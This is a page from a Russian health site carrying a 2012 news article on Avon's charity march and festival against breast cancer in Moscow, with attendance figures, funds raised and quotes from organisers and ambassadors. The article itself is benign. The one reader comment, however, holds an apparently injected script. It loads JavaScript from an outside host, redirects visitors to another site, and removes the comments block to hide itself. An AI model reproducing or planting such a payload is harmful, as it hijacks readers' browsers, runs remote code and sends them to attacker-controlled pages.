Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Марш Avon «Вместе против ...  >>  Марш Avon «Вместе против рака груди» в Москве состоялся
 
Обратная связь
 

Марш Avon «Вместе против рака груди» в Москве состоялся

Размер шрифта
30 мая 2012 13:48
  • google_analytics: false
  • Нравится

Более 18 000 человек поддержали Благотворительный Марш Avon «Вместе против рака груди» и Фестиваль красоты и здоровья 26 мая 2012 г. в Москве.

В этот день порядка 5 500 человек из 40 российских городов прошли маршрут протяженностью 4 км от Болотной набережной по центральным площадям и улицам столицы. Шествие завершилось Фестивалем здоровья и красоты, который состоялся в Центральном Парке Культуры и отдыха им. Горького и собрал более 18 000 участников.

Всего по итогам Шестого Благотворительного Марша и Фестиваля удалось собрать около 8 млн рублей. Эти средства, вырученные от продажи футболок, товаров с розовой лентой, а также включающие пожертвования от партнеров, будут направлены на благотворительные инициативы, в том числе на покупку современного диагностического оборудования для региональных онкологических центров.

В рамках Фестиваля в парке им. Горького работало множество интерактивных площадок. В результате 700 женщин получили профессиональные консультации по вопросам здоровья и красоты груди, информацию о современных методах лечения и реабилитации, а также психологические консультации на площадке «Здоровье», организованной при поддержке компаний Санофи, Mentor и журнала Cosmopolitan Психология.

Профессиональные стилисты сделали модный макияж 200 участницам Фестиваля на площадке «Красота», а более 300 человек стали слушателями увлекательного мастер-класса по макияжу от эксперта Avon – Ольги Колесниковой.

Маленькие гости развлекались на площадке «Детство». Также все желающие могли проверить свои силы в спортивных состязаниях, расслабится на площадке «Йога» и принять участие в танцевальных мастер-классах.

В концерте, который прошел на большой сцене парка, приняли участие звезды российской эстрады – Вера Брежнева, Глюкоза, Анна Семенович, Полина Гагарина, Алексей Гоман, Виктория Лопырева, Эдуард Шульжевский, Юлия Михальчик, Татьяна Котова (группа «Виагра»), Александр Панайотов, Никита, группы «Тутси», «Наоми», «Дэмо», «Любовные истории», а также Алена Винницкая – певица, посол Благотворительной программы Avon «Вместе против рака груди» в Украине. Свои яркие номера представили юные таланты из детских спортивных и хореографических коллективов Москвы.

В рамках Фестиваля состоялась презентация и эксклюзивная предпродажа книги «Я очень хочу жить», автором которой является Дарья Донцова – «главная оптимистка страны», которая вот уже более пяти лет поддерживает Благотворительную программу «Вместе против рака груди». «Я очень хочу жить» – книга о том, как победить страх и начать путь к выздоровлению.

Шестой Марш Avon «Вместе против рака груди» состоялся при поддержке медицинских экспертов, общественных деятелей, партнеров Благотворительной программы – компаний Санофи и Mentor, а также послов Программы – писательницы Дарьи Донцовой и певца и музыканта Алексея Кортнева, который присоединился к Программе в этом году.

– На протяжении шести лет в России, при поддержке наших Послов и партнеров мы объединяем тысячи людей для борьбы против рака груди. Среди них есть и те, кто пережил это заболевание и своим примером вдохновляет бороться и не терять надежду. С каждым годом неравнодушных становится все больше, мы рады видеть в числе участников Марша не только женщин, но и их семьи – тех, кто может подтолкнуть к важному решению задуматься о своем здоровье», - поделилась впечатлениями Анжела Крецу, генеральный директор Avon Россия и Восточная Европа.

– В России ежегодно более 52 000 женщин заболевают раком молочной железы. Поздняя диагностика и неадекватное лечение могут стать трагедией не только для женщины, но и для ее семьи и общества, поскольку женщина является оплотом домашнего очага, воспитывает наших детей. Международная практика показывает, что против этого заболевания можно бороться успешно. Главное – соблюдать 3 условия. Первое – это осознание проблемы. Второе – это ежегодная диагностика. Третье – это эффективное лечение по современным стандартам. С целью повышения знаний об этом социально-значимом заболевании мы запустили всероссийскую программу помощи пациенткам с раком молочной железы «Шанс на жизнь». В рамках программы в 2011 году лечение получили 2 037 женщин, а в 2012 году лечение получат еще 3 000 пациенток в 60 городах России. На марше мы объединили наши усилия с Avon, чтобы тысячи российских женщин сохранили свои жизни! - прокомментировал Патрик Аганян, вице-президент, руководитель Евразийского региона Санофи, генеральный директор Санофи Россия.

– Дорогие мои! С каждым годом растет количество друзей Благотворительного Марша Avon. И все больше женщин начинают регулярно проходить обследование – а значит, наши усилия помогают спасать все больше и больше жизней! – сказала Дарья Донцова, писательница, посол Благотворительной программы Avon «Вместе против рака груди».

– Я очень рад видеть в наших рядах мужчин, ведь именно поддержка близких людей так важна женщинам в любой ситуации. То, что мужчины не стесняются выражать свое отношение к такой, казалось бы, женской проблеме, говорит о том, что мы двигаемся в правильном направлении и смогли привлечь внимание мужской аудитории и заставить задуматься о том, что от здоровья их любимых женщин зависит благополучие всей семьи, - считает Алексей Кортнев, певец, посол Благотворительной программы Avon «Вместе против рака груди».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Раки, которые мы победили   Носите лифчик на здоровье! Теперь не страшно!   Стулья и кресла вызывают рак! Что делать?   Где живете, такой рак и будет! Куда уехать, чтобы не заболеть?  
11 апреля 2013Каждая 30-я смерть от рака из-за водки 06 февраля 2013Технология разведения коров позволяет определить риск развития рака
 
18 октября 2012Новый тест скажет, будет у вас рак или нет 26 сентября 2012Недосыпание приводит к агрессивному раку молочной железы!
 

Слайдшоу

1
Чего боятся женщины с годами
Еда против рака. Часть 3
Цвета против рака

Тесты

Что вы знаете о раке груди?
Что вы знаете о раке груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.